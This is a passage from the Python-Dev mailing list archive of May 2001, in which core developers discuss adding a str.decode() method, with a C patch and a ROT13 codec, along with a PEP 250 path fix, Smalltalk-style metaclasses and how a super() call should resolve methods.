corresponding function/method object?) Because (until now) there was no need. The frame needs to know about the code object, but the rest of the function's context is not needed. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 20:13:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:13:17 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! Message-ID: <3AF04E3D.45AE4F4B@lemburg.com> We already have "data".encode(encoding) which encodes the string data by passing it through the encoder of the given encoding. Wouldn't it be worthwhile to add direct access to codec decoders through string methods as well ? (Note that this addition only makes sense for string objects, since Unicode cannot be decoded.) 
Also, would there be any objections adding some more standard codecs to the system ? I'm thinking of wrapping the binascii module APIs in form of codecs... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 21:18:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:18:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200." <3AF04E3D.45AE4F4B@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com> > We already have "data".encode(encoding) which encodes the string data > by passing it through the encoder of the given encoding. > > Wouldn't it be worthwhile to add direct access to codec decoders > through string methods as well ? > > (Note that this addition only makes sense for string objects, > since Unicode cannot be decoded.) > > Also, would there be any objections adding some more standard > codecs to the system ? I'm thinking of wrapping the binascii > module APIs in form of codecs... Can you provide examples of where this can't be done using the existing approach? Code-bloat police anyone? --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 20:32:46 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:32:46 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> Message-ID: <3AF052CE.E928BDA1@lemburg.com> Guido van Rossum wrote: > > > We already have "data".encode(encoding) which encodes the string data > > by passing it through the encoder of the given encoding. > > > > Wouldn't it be worthwhile to add direct access to codec decoders > > through string methods as well ? 
> > > > (Note that this addition only makes sense for string objects, > > since Unicode cannot be decoded.) > > > > Also, would there be any objections adding some more standard > > codecs to the system ? I'm thinking of wrapping the binascii > > module APIs in form of codecs... > > Can you provide examples of where this can't be done using the > existing approach? There is no existing elegant approach except hooking up to the codecs directly. Adding .decode() is really a matter of adding symmetry. Here are some example of how these two codec methods could be used: xmltext = binarydata.encode('base64') ... binarydata = xmltext.decode('base64') zzz = data.encode('gzip') ... data = zzz.decode('gzip') jpegimage = gifimage.decode('gif').encode('jpeg') mp3audio = wavaudio.decode('wav').encode('mp3') etc. Basically all content transfer encodings can take advantage of these two methods. It's not really code bloat, BTW, since the C API is there; the .decode() method would just expose it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 21:38:10 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:38:10 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200." <3AF052CE.E928BDA1@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com> > > Can you provide examples of where this can't be done using the > > existing approach? > > There is no existing elegant approach except hooking up to the > codecs directly. Adding .decode() is really a matter of adding > symmetry. Yes, but symmetry is good except when it isn't. 
:-) > Here are some example of how these two codec methods could > be used: > > xmltext = binarydata.encode('base64') > ... > binarydata = xmltext.decode('base64') > > zzz = data.encode('gzip') > ... > data = zzz.decode('gzip') > > jpegimage = gifimage.decode('gif').encode('jpeg') > > mp3audio = wavaudio.decode('wav').encode('mp3') > > etc. How would you do this currently? > Basically all content transfer encodings can take advantage of > these two methods. > > It's not really code bloat, BTW, since the C API is there; > the .decode() method would just expose it. Show me the patch and I'll decide whether it's code bloat. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Wed May 2 20:20:24 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 20:20:24 +0200 Subject: [Python-Dev] PEP 250 buglet Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid> PEP 250 suggests changing the sitedirs setup in site.py from sitedirs = [prefix] to sitedirs == [makepath(prefix, "lib", "site-packages")] on windows. it then goes on to say that This change does not preclude packages using the current location -- the change only adds a directory to sys.path, it does not remove anything. this isn't true (even after correcting the typo), since the sitedirs list isn't only added to the path; it's also used to look for PTH files. after this change, PTH files located under prefix will no longer be found. the following change works a bit better: sitedirs = [prefix, makepath(prefix, "lib", "site-packages")] Cheers /F From mal at lemburg.com Wed May 2 21:55:25 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 21:55:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> Message-ID: <3AF0662D.48671B4E@lemburg.com> Guido van Rossum wrote: > > > > Can you provide examples of where this can't be done using the > > > existing approach? > > > > There is no existing elegant approach except hooking up to the > > codecs directly. Adding .decode() is really a matter of adding > > symmetry. > > Yes, but symmetry is good except when it isn't. :-) > > > Here are some example of how these two codec methods could > > be used: > > > > xmltext = binarydata.encode('base64') > > ... > > binarydata = xmltext.decode('base64') > > > > zzz = data.encode('gzip') > > ... > > data = zzz.decode('gzip') > > > > jpegimage = gifimage.decode('gif').encode('jpeg') > > > > mp3audio = wavaudio.decode('wav').encode('mp3') > > > > etc. > > How would you do this currently? By looking up the codecs using the codec registry and then calling them directly. > > Basically all content transfer encodings can take advantage of > > these two methods. > > > > It's not really code bloat, BTW, since the C API is there; > > the .decode() method would just expose it. > > Show me the patch and I'll decide whether it's code bloat. :-) I've attached the patch. 
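MAL's answer (look the codec up in the registry and call it directly) can be sketched in modern Python 3 terms. The helpers below are hypothetical: `decode_via_registry` is a rough analogue of the proposed `PyString_AsDecodedString()` in that it looks up the codec, decodes, converts a text result back to bytes, and rejects anything else with `TypeError`. Treating UTF-8 as the "default encoding" is an assumption of this sketch; the C patch uses whatever the interpreter default is. The sketch uses `zlib` rather than `gzip`, since Python 3 ships no codec named `gzip`.

```python
import codecs


def decode_via_registry(data: bytes, encoding: str, errors: str = "strict") -> bytes:
    """Hypothetical analogue of the proposed PyString_AsDecodedString()."""
    codec = codecs.lookup(encoding)  # raises LookupError for unknown codec names
    result, _consumed = codec.decode(data, errors)
    if isinstance(result, str):
        # The C patch re-encodes Unicode results with the default encoding;
        # this sketch assumes that default is UTF-8.
        result = result.encode("utf-8")
    if not isinstance(result, bytes):
        raise TypeError(
            "decoder did not return a bytes object (type=%s)" % type(result).__name__
        )
    return result


def encode_via_registry(data: bytes, encoding: str, errors: str = "strict") -> bytes:
    """Companion helper for the encode direction, using the same registry."""
    result, _consumed = codecs.lookup(encoding).encode(data, errors)
    return result
```

In Python 3, `bytes.decode()` accepts only text encodings, so byte-to-byte codecs such as `base64` and `zlib` are reached through `codecs.encode()` and `codecs.decode()` or, as here, through `codecs.lookup()`.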
Due to a small reorganisation the patch is a little longer -- symmetry has its price at C level too ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ -------------- next part -------------- --- CVS-Python/Include/stringobject.h Sat Feb 24 10:30:49 2001 +++ Dev-Python/Include/stringobject.h Wed May 2 21:05:12 2001 @@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE PyObject *str, /* string object */ const char *encoding, /* encoding */ const char *errors /* error handling */ ); +/* Decodes a string object and returns the result as Python string + object. */ + +extern DL_IMPORT(PyObject*) PyString_AsDecodedString( + PyObject *str, /* string object */ + const char *encoding, /* encoding */ + const char *errors /* error handling */ + ); + /* Provides access to the internal data buffer and size of a string object or the default encoded version of an Unicode object. Passing NULL as *len parameter will force the string buffer to be 0-terminated (passing a string with embedded NULL characters will cause an exception). 
*/ --- CVS-Python/Objects/stringobject.c Wed May 2 16:19:22 2001 +++ Dev-Python/Objects/stringobject.c Wed May 2 21:04:34 2001 @@ -138,42 +138,56 @@ PyString_FromString(const char *str) PyObject *PyString_Decode(const char *s, int size, const char *encoding, const char *errors) { - PyObject *buffer = NULL, *str; + PyObject *v, *str; + + str = PyString_FromStringAndSize(s, size); + if (str == NULL) + return NULL; + v = PyString_AsDecodedString(str, encoding, errors); + Py_DECREF(str); + return v; +} + +PyObject *PyString_AsDecodedString(PyObject *str, + const char *encoding, + const char *errors) +{ + PyObject *v; + + if (!PyString_Check(str)) { + PyErr_BadArgument(); + goto onError; + } if (encoding == NULL) encoding = PyUnicode_GetDefaultEncoding(); /* Decode via the codec registry */ - buffer = PyBuffer_FromMemory((void *)s, size); - if (buffer == NULL) - goto onError; - str = PyCodec_Decode(buffer, encoding, errors); - if (str == NULL) + v = PyCodec_Decode(str, encoding, errors); + if (v == NULL) goto onError; /* Convert Unicode to a string using the default encoding */ - if (PyUnicode_Check(str)) { - PyObject *temp = str; - str = PyUnicode_AsEncodedString(str, NULL, NULL); + if (PyUnicode_Check(v)) { + PyObject *temp = v; + v = PyUnicode_AsEncodedString(v, NULL, NULL); Py_DECREF(temp); - if (str == NULL) + if (v == NULL) goto onError; } - if (!PyString_Check(str)) { + if (!PyString_Check(v)) { PyErr_Format(PyExc_TypeError, "decoder did not return a string object (type=%.400s)", - str->ob_type->tp_name); - Py_DECREF(str); + v->ob_type->tp_name); + Py_DECREF(v); goto onError; } - Py_DECREF(buffer); - return str; + return v; onError: - Py_XDECREF(buffer); return NULL; } PyObject *PyString_Encode(const char *s, int size, @@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb return NULL; return PyString_AsEncodedString((PyObject *)self, encoding, errors); } +static char decode__doc__[] = +"S.decode([encoding[,errors]]) -> string\n\ +\n\ +Return a decoded 
string version of S. Default encoding is the current\n\ +default string encoding. errors may be given to set a different error\n\ +handling scheme. Default is 'strict' meaning that encoding errors raise\n\ +a ValueError. Other possible values are 'ignore' and 'replace'."; + +static PyObject * +string_decode(PyStringObject *self, PyObject *args) +{ + char *encoding = NULL; + char *errors = NULL; + if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors)) + return NULL; + return PyString_AsDecodedString((PyObject *)self, encoding, errors); +} + + static char expandtabs__doc__[] = "S.expandtabs([tabsize]) -> string\n\ \n\ Return a copy of S where all tab characters are expanded using spaces.\n\ If tabsize is not given, a tab size of 8 characters is assumed."; @@ -2347,10 +2373,11 @@ string_methods[] = { {"title", (PyCFunction)string_title, 1, title__doc__}, {"ljust", (PyCFunction)string_ljust, 1, ljust__doc__}, {"rjust", (PyCFunction)string_rjust, 1, rjust__doc__}, {"center", (PyCFunction)string_center, 1, center__doc__}, {"encode", (PyCFunction)string_encode, 1, encode__doc__}, + {"decode", (PyCFunction)string_decode, 1, decode__doc__}, {"expandtabs", (PyCFunction)string_expandtabs, 1, expandtabs__doc__}, {"splitlines", (PyCFunction)string_splitlines, 1, splitlines__doc__}, #if 0 {"zfill", (PyCFunction)string_zfill, 1, zfill__doc__}, #endif From mal at lemburg.com Wed May 2 22:36:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 22:36:30 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AF06FCE.854D4DF7@lemburg.com> Here's a little fun codec to play with. It encodes the input using the ROT13 encoding (which is 1-1 and idempotent). 
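The `rot_13.py` attachment was scrubbed from the archive, so here is a minimal stand-in sketch (not MAL's code). ROT13 rotates each ASCII letter 13 places, so applying it twice returns the original text. The search function and the codec name `rot13_sketch` are hypothetical; `codecs.register()` and `codecs.CodecInfo` are the standard registration hooks in Python 3.

```python
import codecs
import string

# Translation table: each ASCII letter maps to the letter 13 places later, wrapping around.
_ROT13_TABLE = str.maketrans(
    string.ascii_lowercase + string.ascii_uppercase,
    string.ascii_lowercase[13:] + string.ascii_lowercase[:13]
    + string.ascii_uppercase[13:] + string.ascii_uppercase[:13],
)


def rot13(text: str) -> str:
    """Rotate ASCII letters by 13 places; other characters pass through."""
    return text.translate(_ROT13_TABLE)


def _rot13_codec(text, errors="strict"):
    # Codec functions return (output, number_of_input_items_consumed).
    return rot13(text), len(text)


def _search(name):
    # Hypothetical codec name; the registry calls this with a normalized name.
    if name == "rot13_sketch":
        return codecs.CodecInfo(_rot13_codec, _rot13_codec, name="rot13_sketch")
    return None


codecs.register(_search)
```

Because ROT13 is its own inverse, the same function serves as both encoder and decoder. Python 3 also ships a text-to-text codec named `rot_13`, reachable through `codecs.encode()`, which produces the same output as this sketch.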
The main difference over the existing codecs is that it returns a string rather than Unicode. To install it, simply place it in some directory on your Python path. Here's some sample output (Netscape can unscramble this BTW): """ Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf n fgevat engure guna Havpbqr. Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba cngu. """ -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ -------------- next part -------------- A non-text attachment was scrubbed... Name: rot_13.py Type: text/python Size: 2066 bytes Desc: not available URL: From guido at digicool.com Thu May 3 00:11:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 17:11:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200." <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> > [From Jim Althoff] > > In the list below, indentation indicates class hieararchy (superclass -- > > subclass) > The indentation, unfortunately, seems to be destroyed. [...] > A question for Jim (this is more Smalltalk than Python related): > How does the Behaviour class fit into this picture? Jim responded with a much clearer diagram, and as a bonus an answer to your question about Behaviour! > Hi Guido, > > Sorry about the mangled diagram. It's kind of tricky doing this with just > text. :-) Anyway, below is a -- hopefully -- improved diagram and > description. > > At the very bottom is an answer to the question about "Behavior". 
> > Jim > > ========================================== > > Smalltalk-80 (simplified) class/metaclass structure: > > Terminology: > o A "class" is an object that can be instantiated. > o A "metaclass" is a class and is one such that when _it_ is instantiated > _that_ instance is _itself_ a class (which can be instantiated). > (A metaclass is a specialization of class). > > Essentially, there are two parallel hierarchies: 1) the class hierarchy > and 2) the metaclass hierarchy. The class hierarchy starts with class > Object. The metaclass hierarchy starts right below Class with the > metaclass ObjectMetaClass. > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > > Object is the top of the class hierarchy (and total hierarchy). It has no > superclass. It is the only class that has no superclass. > Class is a subclass of Object. > MetaClass is a subclass of Class. > > ObjectMetaClass is also a subclass of Class. > ClassMetaClass is a subclass of ObjectMetaClass. > MetaClassMetaClass is a subclass of ClassMetaClass. > > Adding in application classes Rectangle and SpamRectangle then might look > like: > > > o Object > o Class > o MetaClass > o ObjectMetaClass > o ClassMetaClass > o MetaClassMetaClass > o RectangleMetaClass > o SpamRectangleMetaClass > o Rectangle > o SpamRectangle > > Rectangle is a subclass of Object. > SpamRectangle is a subclass of Rectangle. > > RectangleMetaClass is a subclass of ObjectMetaClass. > SpamRectangleMetaClass is a subclass of RectangleMetaClass. > > Rectangle is an instance of RectangleMetaClass. > SpamRectangle is an instance of SpamRectangleMetaClass. > (SpamRectangleMetaClass is an instance of MetaClass.) > > The next list shows both the subclass- and the instanceOf- relationships > between classes and metaclasses. > > In this list a class listed below another class is a subclass of it. 
> SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam -- > the class of which class Spam is an instance). > > Class > Object instanceOf ObjectMC instanceOf MetaClass > Class instanceOf ClassMC instanceOf MetaClass > MetaClass instanceOf MetaClassMC instanceOf MetaClass > > ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances > of MetaClass. > > MetaClass is an instance of MetaClassMetaClass But MetaClassMetaClass is > an instance of MetaClass. So this particular relationship is circular. > (In Smalltalk-76, Class was an instance of itself.) > > Application classes would have a similar, parallel hierarchy between > classes and their associated metaclasses. For example: > > Object instanceOf ObjectMC instanceOf MetaClass > Rectangle instanceOf RectangleMC instanceOf MetaClass > SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass > > When you create class SpamRectangle as a subclass of class Rectangle, the > code in the class-creation method first creates the metaclass > SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of > RectangleMetaClass. The code then creates the SpamRectangle class as an > instance of the SpamRectangleMetaClass metaclass it just created. > > You can then create instances of class SpamRectangle. > > SpamRectangle "instance methods" reside in the method dict of > SpamRectangle. > SpamRectangle "class methods" reside in the method dict of > SpamRectangleMetaClass. > > ============================ > > Regarding Thomas' question: > > The Smalltalk-80 class hierarchy actually has a bit more factoring than > what I show above. In particular, Class and MetaClass are subclasses of > the class ClassDescription. ClassDescription is a subclass of class > Behavior. Behavior is a subclass of Object. 
> > So it looks like: > > > o Object > o Behavior > o ClassDescription > o MetaClass > o Class > o ObjectMetaClass > o BehaviorMetaClass > o ClassDescriptionMetaClass > o MetaClassMetaClass > o ClassMetaClass > > Class Behavior basically abstracts the creation and handling of method > dict.s. Class ClassDescription factors out common, reusable code between > MetaClass and Class. Clearly there are a number of ways of designing (or > over-designing ) this part of the hierarchy. The key idea, though, > was to use the subclassing mechanism as a way of supportig specialized > class methods. > > ============================= --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Wed May 2 23:24:28 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 2 May 2001 17:24:28 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77 In-Reply-To: Message-ID: [Fred L. Drake] > Update the filter() and list() descriptions to include information > about the support for containers and iteration. > ... > \begin{funcdesc}{list}{sequence} > ! Return a list whose items are the same and in the same order as > ! \var{sequence}'s items. \var{sequence} may be either a sequence, > ! a container that supports iteration, or an iterator object. > ... [and similarly for filter()] Before we repeat this last incantation umpteen more times in the docs, is this how we want it to read in the end? The truth of the implementation and of the design is that "sequence" is any object that supports iteration, period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they raise TypeError). "A sequence" and "an iterator object" *always* support iteration, so naming them too appears to draw a distinction that doesn't exist. Suggested alternative: \var{sequence} must support iteration (see XXX). 
where XXX is common boilerplate explaining what "support iteration" means, and that sequences and iterator objects are just particular cases of that. Note that this boilerplate may expand to include generators too before 2.2 is real, and a generator isn't really "a container that supports iteration" (the word "container" is a strain in the generator context). That is, a long-winded incantation is just going to get longer over time, and if it's repeated umpteen places in the docs I doubt they'll all get updated when needed. From michel at digicool.com Wed May 2 23:43:42 2001 From: michel at digicool.com (Michel Pelletier) Date: Wed, 2 May 2001 14:43:42 -0700 (PDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> Message-ID: On Wed, 2 May 2001, Guido van Rossum wrote: > > > > o Object > > o Class > > o MetaClass > > o ObjectMetaClass > > o ClassMetaClass > > o MetaClassMetaClass > > > > Object is the top of the class hierarchy (and total hierarchy). It has no > > superclass. It is the only class that has no superclass. > > Class is a subclass of Object. > > MetaClass is a subclass of Class. > > > > ObjectMetaClass is also a subclass of Class. > > ClassMetaClass is a subclass of ObjectMetaClass. > > MetaClassMetaClass is a subclass of ClassMetaClass. Does this go on ad infinitum? ie, is there a ClassMetaClassMetaClass which sublcasses MetaClassMetaClass and so on? I was under the impression from talking to JimF that Smalltalk eventually stopped at a class that is a subclass of itself. -Michel From greg at cosc.canterbury.ac.nz Thu May 3 03:35:29 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 13:35:29 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> "M.-A. 
Lemburg" : > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that DictType.__repr__ could mean either the unbound method for finding the repr of a dictionary, or the bound method for finding the repr of DictType itself. This ambiguity is inherent in the Python language as soon as you try to make classes into instances (which you have to do as a consequence of making types into classes). Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:15:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:15:41 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz> Michel Pelletier : > I was under the impression > from talking to JimF that Smalltalk eventually stopped at a class > that is a subclass of itself. Some years ago, while playing with Sun's Postscript-based NeWS window system, I devised an OO language (called P) that got translated into PostScript. It had a very Smalltalk-like class/metaclass system, although rather simpler than what JimF described. As I remember, the kernel consisted of a little knot of about 6 classes with some interesting incestuous relationships between them. If anyone's interested, I could dig out the code and provide details of how it all worked. There might be some ideas that could be used in Python. (Programming in P felt a lot like programming in Python, by the way. If my name had been Guido, who knows where it might have led!) 
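The `DictType.__repr__` ambiguity Greg raises earlier in this message was later settled in Python by looking up special methods on the type of an object rather than on the object itself. A small Python 3 sketch, in which `dict` plays the role of `DictType` and `Spam` is a made-up class:

```python
d = {"a": 1}

# Looked up on the class, __repr__ is the function that formats dict *instances*.
instance_repr = dict.__repr__(d)

# The repr of the class object itself comes from its metaclass, type.
class_repr = type.__repr__(dict)

# repr() consults type(obj), never obj itself, so the two meanings never collide.
assert repr(d) == instance_repr
assert repr(dict) == class_repr


class Spam:
    def __repr__(self):
        return "<a Spam instance>"


# Spam.__repr__ is the instance-level method...
assert Spam.__repr__(Spam()) == "<a Spam instance>"
# ...while repr(Spam) still goes through type.__repr__.
assert repr(Spam) == type.__repr__(Spam)
```

Attribute access such as `dict.__repr__` still finds the instance-level method first. Only the implicit lookup performed by `repr()` and similar built-ins skips the object and starts at its type.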
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:25:12 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:25:12 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFF710.9471.8025D7EA@localhost> Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz> Gordon McMillan : > I would like to see ... some discussion of the expected > pragmatic benefits. (That's a different topic from subclassing > types.) Actually, it's not -- the two issues are connected. Suppose we succeed in unifying types and classes. Then instead of classes being of type ClassType, they are now instances of ClassClass. So classes are also instances, or in other words, we have unified classes and instances. So even if we don't go as far as adding Smalltalk-style class-methods-via-metaclasses, we still have to deal with the fact that some things will be both classes and instances. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:27:34 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:27:34 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Guido: > Actually, I think that what's in the __dict__ is just perfect I was thinking of backwards compatibility for people who are hacking the __dict__ of a class directly. 
If you don't care about that, the problem is simpler. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:39:08 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:39:08 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> Guido: > Will we need to add a "::" operator to Python??? If so, I hope we can find a syntax that doesn't remind one of C++ so much... I have an idea! How about spelling super(self, MyBaseClass) as MyBaseClass[self] This can be thought of as a sort of "cast" which turns self into an object which behaves like it were an instance of MyBaseClass. Then we can write MyBaseClass[self].foo(args) Advantages: * Concise and uncluttered * No new syntax needed * Can be implemented using existing mechanisms * Doesn't even remotely resemble anything in C++ :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Thu May 3 07:49:04 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 3 May 2001 01:49:04 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF01381.592AE31B@lemburg.com> Message-ID: [MAL, on basemethods] > ... > In other words: you let Python continue the search for the method > as if it hadn't found the occurrance calling the bsaemethod() > API. Hmm, still not clear enough... 
> better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?

Sorry, I'm not sure what either of you is talking about. In

    class A(B, C):
        def foo(self):
            super.foo()

Guido said that super would start searching at B, but I don't know what
your "continue the search for the method as if it hadn't found the
occurrence calling the basemethod() API" means: defining what a thing does
in terms of an unspecified API it doesn't use is a pretty sure recipe for
compounded confusion.

Given that we're using Python's search rules, the ambiguous point remaining
is whether:

    super.f()

textually contained in a method of class K begins searching with:

    1) K.__bases__

or with:

    2) self.__class__.__bases__

Java uses #1, and Guido's "the search starts with B" implies that he would
too. But it's unclear whether he meant that. Given also

    class D(A):
        def foo(self):
            super.foo()

    D().foo()

both views agree that D.foo() is invoked first, and that D.foo() invokes
A.foo() next. But under #1 A.foo() invokes B.foo() next, while under #2
A.foo() invokes A.foo() again. Multiple inheritance is a red herring here --
take C out of A's bases, and the same ambiguity needs to be resolved.

From greg at cosc.canterbury.ac.nz Thu May 3 07:56:07 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 17:56:07 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To:
Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz>

Tim:

> Java uses #1, and Guido's "the search starts with B" implies that he would
> too. But it's unclear whether he meant that.

It's the only sane thing for him to mean, as far as I can see.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz      +--------------------------------------+

From pf at artcom-gmbh.de Thu May 3 08:29:03 2001
From: pf at artcom-gmbh.de (Peter Funk)
Date: Thu, 3 May 2001 08:29:03 +0200 (MEST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001 3:39: 8 pm"
Message-ID:

Hi,

Greg Ewing:
[...]
> How about spelling super(self, MyBaseClass) as
>
>    MyBaseClass[self]
>
> This can be thought of as a sort of "cast" which turns self
> into an object which behaves like it were an instance of
> MyBaseClass. Then we can write
>
>    MyBaseClass[self].foo(args)
>
> Advantages:
>   * Concise and uncluttered
>   * No new syntax needed
>   * Can be implemented using existing mechanisms
>   * Doesn't even remotely resemble anything in C++ :-)

Disadvantages:
  * People will confuse this with calling
    MyBaseClass.__getitem__(....)
  * Doesn't even remotely resemble anything in C++

We have to face it: I myself don't like C++ either, but a *lot* of people
are already familiar with C++ today. Giving them something they are already
familiar with will make it easier to convert some of them to Python.

To Greg: This '::' operator is not at all that ugly and, as far as I can
see, would not introduce any backward incompatible change to the language.
I'm sure C++ has some other real warts to offer that neither of us wants to
see in a future version of Python. Right?

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)

From mal at lemburg.com Thu May 3 09:49:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
